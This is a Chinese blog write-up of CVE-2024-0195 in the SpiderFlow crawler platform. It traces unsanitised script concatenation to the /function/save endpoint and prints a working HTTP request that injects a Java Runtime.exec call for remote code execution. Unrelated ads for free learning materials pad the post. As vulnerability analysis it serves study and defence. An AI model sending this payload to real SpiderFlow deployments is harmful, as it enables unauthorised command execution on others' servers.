SpiderFlow爬虫平台漏洞利用分析（CVE-2024-0195）

    StringBuffer scriptBuffer = new StringBuffer();
    scriptBuffer.append("function ")
            .append(functionName)
            .append("(")
            .append(parameters == null ? "" : parameters)
            .append("){")
            .append(script)
            .append("}");
    return scriptBuffer.toString();
}

​ 可以看到`concatScript` 方法中，它接受三个参数 `functionName`、`parameters` 和 `script`，然后将它们拼接成一个 JavaScript 函数的字符串。这里它没有任何的过滤。所以我们可以尝试构造恶意的这三个参数实现RCE。


帮助网安学习，全套资料S信免费领取：  
 ① 网安学习成长路径思维导图  
 ② 60+网安经典常用工具包  
 ③ 100+SRC分析报告  
 ④ 150+网安攻防实战技术电子书  
 ⑤ 最权威CISSP 认证考试指南+题库  
 ⑥ 超1800页CTF实战技巧手册  
 ⑦ 最新网安大厂面试题合集（含答案）  
 ⑧ APP客户端安全检测指南（安卓+IOS）


​ 在上面的函数中将产生如下的字符串：

function functionName(parameters){script}

​ 很明显我们可以构造恶意的script来导致RCE：


​ 例如script的值可以为`}Java.type('java.lang.Runtime').getRuntime().exec('calc');{`


​ 这样的话我们最终的字符串将会变成：

function functionName(parameters){}Java.type(‘java.lang.Runtime’).getRuntime().exec(‘calc’);{}

​ 然后最后在执行的时候就会直接定义一个函数后执行我们的Java恶意代码。


​ 然后我们分析是哪个函数调用了`validScript`函数


![image-20240113221705800](https://img-blog.csdnimg.cn/img_convert/3a26777a4541b7cfbe455f96663aa3bd.png)

public String saveFunction(Function entity) {
    try {
        ScriptManager.validScript(entity.getName(),entity.getParameter(),entity.getScript());
        super.saveOrUpdate(entity);
        init();
        return null;
    } catch (Exception e) {
        logger.error("保存自定义函数出错",e);
        return ExceptionUtils.getStackTrace(e);
    }
}

​ 然后在`FunctionController.java`调用了`saveFunction`

@RestController
@RequestMapping(“/function”)
public class FunctionController {
…
@RequestMapping(“/save”)
public String save(Function function){
return functionService.saveFunction(function);
}
…
}

​ 然后我们现在就可以去实际的功能点看需要哪些参数：


![image-20240113223447553](https://img-blog.csdnimg.cn/img_convert/1663e9e17abc0650966d11fe78a55289.png)


![image-20240113223535043](https://img-blog.csdnimg.cn/img_convert/a8d941bf9d588ee16df445aa566e1bf1.png)


​ 于是我们直接写出payload:

POST /function/save HTTP/1.1
Content-Length: 38
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Host: localhost:8088

id=&name=rce&parameter=rce&script=}Java.type(‘java.lang.Runtime’).getRuntime().exec(‘calc’);{

​ 成功命令执行弹出计算器：  
 ![cve-2024-1](https://img-blog.csdnimg.cn/img_convert/4f2b94c6761ab989d864649e3028aa9f.gif)


**修复方式**


* 过滤好script参数
* 设置沙箱


### 5. 总结


​ 这个项目在Gitee上面有`7.4K`的Star，有`3.6K`的fork记录，在实际部署上也不是很少，但是漏洞点出的不是很难主要是思路扩展，适宜入门。






### 最后

Python崛起并且风靡，因为优点多、应用领域广、被大牛们认可。学习 Python 门槛很低，但它的晋级路线很多，通过它你能进入机器学习、数据挖掘、大数据，CS等更加高级的领域。Python可以做网络应用，可以做科学计算，数据分析，可以做网络爬虫，可以做机器学习、自然语言处理、可以写游戏、可以做桌面应用…Python可以做的很多，你需要学好基础，再选择明确的方向。这里给大家分享一份全套的 Python 学习资料，给那些想学习 Python 的小伙伴们一点帮助！

#### 👉Python所有方向的学习路线👈

Python所有方向的技术点做的整理，形成各个领域的知识点汇总，它的用处就在于，你可以按照上面的知识点去找对应的学习资源，保证自己学得较为全面。

![](https://img-blog.csdnimg.cn/img_convert/604bae65027d4d67fb62410deb210454.png)

#### 👉Python必备开发工具👈

工欲善其事必先利其器。学习Python常用的开发软件都在这里了，给大家节省了很多时间。

![](https://img-blog.csdnimg.cn/img_convert/fa276175617e0048f79437bd30465479.png)



#### 👉Python全套学习视频👈

我们在看视频学习的时候，不能光动眼动脑不动手，比较科学的学习方法是在理解之后运用它们，这时候练手项目就很适合了。

![](https://img-blog.csdnimg.cn/img_convert/16ac689cb023166b2ffa9c677ac40fc0.png)



#### 👉实战案例👈



学python就与学数学一样，是不能只看书不做题的，直接看步骤和答案会让人误以为自己全都掌握了，但是碰到生题的时候还是会一筹莫展。



因此在学习python的过程中一定要记得多动手写代码，教程只需要看一两遍即可。

![](https://img-blog.csdnimg.cn/img_convert/0d8c31c50236a205928a1d8ae8a0b883.png)



#### 👉大厂面试真题👈

我们学习Python必然是为了找到高薪的工作，下面这些面试题是来自阿里、腾讯、字节等一线互联网大厂最新的面试资料，并且有阿里大佬给出了权威的解答，刷完这一套面试资料相信大家都能找到满意的工作。

![](https://img-blog.csdnimg.cn/img_convert/99461e47e58e503d2bc1dc6f4668534a.png)

**[需要这份系统化学习资料的朋友，可以戳这里无偿获取](https://bbs.csdn.net/topics/618317507)**

**一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！**